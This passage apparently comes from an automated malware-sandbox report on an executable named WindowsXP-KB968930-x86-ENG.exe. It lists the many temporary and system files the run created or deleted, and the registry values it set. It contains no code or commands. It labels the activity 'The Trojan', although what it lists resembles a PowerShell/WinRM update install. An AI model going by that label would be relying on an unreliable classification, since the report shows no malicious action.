%System%\WindowsPowerShell\v1.0\SET49.tmp (24 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (31 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (57 bytes)
%System%\GroupPolicy\Adm\SET1C.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (3 bytes)
%System%\SET16.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC2.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (3361 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETBC.tmp (15 bytes)
%System%\CatRoot2\dberr.txt (1499 bytes)
%WinDir%\inf\oem11.PNF (13062 bytes)
%System%\SETB.tmp (1281 bytes)
%System%\SET1F.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (6 bytes)
%System%\spupdsvc.exe (23 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (22 bytes)
%System%\SET28.tmp (22 bytes)
%System%\SET5.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (2321 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (1 bytes)
%System%\SET31.tmp (673 bytes)
%System%\SET2E.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (10 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
%System%\WindowsPowerShell\v1.0\SET3A.tmp (601 bytes)
%System%\SET29.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (21 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (6 bytes)
%System%\SET2C.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC1.tmp (16 bytes)
%WinDir%\KB968930.log (240837 bytes)
%System%\SET15.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (18248 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (438 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (22 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (12 bytes)
%System%\SET24.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (10177 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (19 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (17 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (1425 bytes)
%WinDir%\KB968930xp.cat (59 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (9 bytes)
%System%\winrm\0409\SET1D.tmp (601 bytes)
%System%\SETD.tmp (601 bytes)
%WinDir%\inf\SET19.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (18 bytes)
%System%\SET9.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SETC6.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (12 bytes)
%System%\winrm\0409\SET37.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (40 bytes)
%System%\WindowsPowerShell\v1.0\SET39.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (1281 bytes)
%System%\SET2F.tmp (789 bytes)
%WinDir%\Help\SETC5.tmp (12287 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (8 bytes)
%WinDir%\inf\oem11.inf (673 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (23 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (2 bytes)
%System%\SET30.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (6 bytes)
%System%\wbem\SET1E.tmp (4 bytes)
%System%\SET23.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET3B.tmp (24 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (10 bytes)
%WinDir%\inf\SET33.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (7 bytes)

The Trojan deletes the following file(s):

%System%\SETBF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (0 bytes)
%System%\SET12.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (0 bytes)
%WinDir%\_000003_.tmp.dll (0 bytes)
%System%\GroupPolicy\Adm\SET35.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (0 bytes)
%System%\SETC.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (0 bytes)
%System%\_000002_.tmp.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC0.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (0 bytes)
%System%\wevtfwd.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (0 bytes)
%WinDir%\inf\windowsremotemanagement.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (0 bytes)
%System%\SET25.tmp (0 bytes)
%System%\SET13.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (0 bytes)
%System%\SET20.tmp (0 bytes)
%System%\SET14.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (0 bytes)
%WinDir%\inf\SET32.tmp (0 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBE.tmp (0 bytes)
%System%\SET7.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET34.tmp (0 bytes)
%System%\SET2A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (0 bytes)
%System%\WsmWmiPl.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (0 bytes)
%System%\GroupPolicy\Adm\WindowsRemoteShell.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (0 bytes)
%System%\winrm\0409\winrm.ini (0 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC4.tmp (0 bytes)
%System%\winrscmd.dll (0 bytes)
%System%\SET2B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (0 bytes)
%System%\SET2E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC7.tmp (0 bytes)
%System%\wsmanhttpconfig.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (0 bytes)
%System%\winrm.cmd (0 bytes)
%System%\SETE.tmp (0 bytes)
%System%\winrm.vbs (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (0 bytes)
%System%\SET6.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET36.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (0 bytes)
%System%\wbem\SET4.tmp (0 bytes)
%System%\SET17.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (0 bytes)
%System%\SETA.tmp (0 bytes)
%System%\SET22.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (0 bytes)
%System%\SET27.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (0 bytes)
%System%\SET11.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCA.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (0 bytes)
%System%\WsmAuto.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (0 bytes)
%System%\SET8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (0 bytes)
%System%\SETF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC9.tmp (0 bytes)
%System%\wbem\wsmAuto.mof (0 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBD.tmp (0 bytes)
%System%\wsmplpxy.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (0 bytes)
%System%\SET26.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (0 bytes)
%System%\SET21.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET38.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET49.tmp (0 bytes)
%System%\SET16.tmp (0 bytes)
%System%\GroupPolicy\Adm\windowsremotemanagement.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (0 bytes)
%System%\GroupPolicy\Adm\EventForwarding.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (0 bytes)
%System%\winrmprov.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (0 bytes)
%System%\wsmprovhost.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETBC.tmp (0 bytes)
%System%\winrmprov.mof (0 bytes)
%System%\SETB.tmp (0 bytes)
%System%\SET1F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (0 bytes)
%System%\SET28.tmp (0 bytes)
%System%\SET5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (0 bytes)
%System%\winrshost.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (0 bytes)
%System%\SET31.tmp (0 bytes)
%WinDir%\inf\SET18.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (0 bytes)
%System%\WsmPty.xsl (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (0 bytes)
%System%\SET29.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (0 bytes)
%System%\WsmRes.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (0 bytes)
%WinDir%\Temp\UPD3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (0 bytes)
%System%\SET2C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (0 bytes)
%System%\SET15.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (0 bytes)
%System%\wbem\SET1E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (0 bytes)
%System%\SET2D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (0 bytes)
%System%\SET24.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (0 bytes)
%System%\winrssrv.dll (0 bytes)
%WinDir%\inf\WindowsRemoteShell.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (0 bytes)
%System%\winrm\0409\SET1D.tmp (0 bytes)
%System%\SETD.tmp (0 bytes)
%System%\SET10.tmp (0 bytes)
%WinDir%\inf\SET19.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (0 bytes)
%System%\SET9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC6.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (0 bytes)
%System%\winrm\0409\SET37.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (0 bytes)
%System%\winrs.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET39.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (0 bytes)
%System%\SET2F.tmp (0 bytes)
%WinDir%\Help\SETC5.tmp (0 bytes)
%System%\WsmSvc.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (0 bytes)
%System%\winrsmgr.dll (0 bytes)
%System%\SET30.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1A.tmp (0 bytes)
%System%\SET23.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (0 bytes)
%System%\WsmTxt.xsl (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (0 bytes)
%WinDir%\inf\SET33.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (0 bytes)

The process PSCustomSetupUtil.exe:3920 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\67EKQW17\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)

The process PSCustomSetupUtil.exe:2868 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\84AFKPV0\Microsoft.PowerShell.GraphicalHost.dll (9608 bytes)

The process PSCustomSetupUtil.exe:2908 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\98EJOUZ4\System.Management.Automation.dll (81046 bytes)

The process PSCustomSetupUtil.exe:1784 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\79GLRX39\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)

The process PSCustomSetupUtil.exe:2924 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\MJPU05AF\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)

The process PSCustomSetupUtil.exe:3320 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\CELRW28E\Microsoft.PowerShell.GraphicalHost.resources.dll (784 bytes)

The process PSCustomSetupUtil.exe:3000 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\ZW27CINS\Microsoft.PowerShell.Editor.dll (32824 bytes)

The process PSCustomSetupUtil.exe:2424 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\GDJOTY49\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:3164 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\URX27CHN\Microsoft.PowerShell.GPowerShell.dll (22192 bytes)

The process PSCustomSetupUtil.exe:2176 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\KLSX39FL\Microsoft.WSMan.Management.dll (9608 bytes)

The process PSCustomSetupUtil.exe:2684 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\QNTY38EJ\Microsoft.PowerShell.Security.resources.dll (9 bytes)

The process PSCustomSetupUtil.exe:500 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\14BHNTY4\Microsoft.PowerShell.Security.dll (2392 bytes)

The process PSCustomSetupUtil.exe:2460 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\KFLQV05B\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:2284 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\95BHMRW1\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)

The process PSCustomSetupUtil.exe:2588 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\ECHMSX27\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)

The process PSCustomSetupUtil.exe:3464 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\517CINSX\Microsoft.PowerShell.GPowerShell.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:224 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\Y4BHNTZ4\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)

The process PSCustomSetupUtil.exe:1880 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\GEKPUZ5A\System.Management.Automation.resources.dll (9320 bytes)

The process PSCustomSetupUtil.exe:3392 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\KKRW16BG\Microsoft.PowerShell.Editor.resources.dll (2392 bytes)

The process PSCustomSetupUtil.exe:780 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\35CIOUZ5\Microsoft.WSMan.Runtime.dll (7 bytes)

The process PSCustomSetupUtil.exe:2556 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\NLRW16BH\Microsoft.WSMan.Management.resources.dll (13 bytes)

The process PSCustomSetupUtil.exe:3784 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\ZV17CHMR\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)

The process PSCustomSetupUtil.exe:2572 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\MKQV05AG\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)

The process mscorsvw.exe:3848 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (2260 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319\NGEN_SERVICE.LOG (172 bytes)

Registry activity

The process mofcomp.exe:2760 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF 26 4C 2D 5E 4C 0E 29 01 B1 2C 37 8D 24 19 A6"

The process WindowsXP-KB968930-x86-ENG.exe:368 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "20 58 17 DB 74 91 CC 3E 14 5B 60 F5 D5 16 94 EF"

The process ngen.exe:1788 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "71 BD 81 F0 8A 43 51 B2 18 F5 92 0F 6C DC 9C 37"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

The process ngen.exe:1024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 DC 66 58 D8 83 A4 66 C6 5D 9A DE 5E 9D 1D 19"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

The process ngen.exe:1236 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 7A FF BD 73 FC B1 6F E1 C8 2B AC F7 41 C4 E8"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

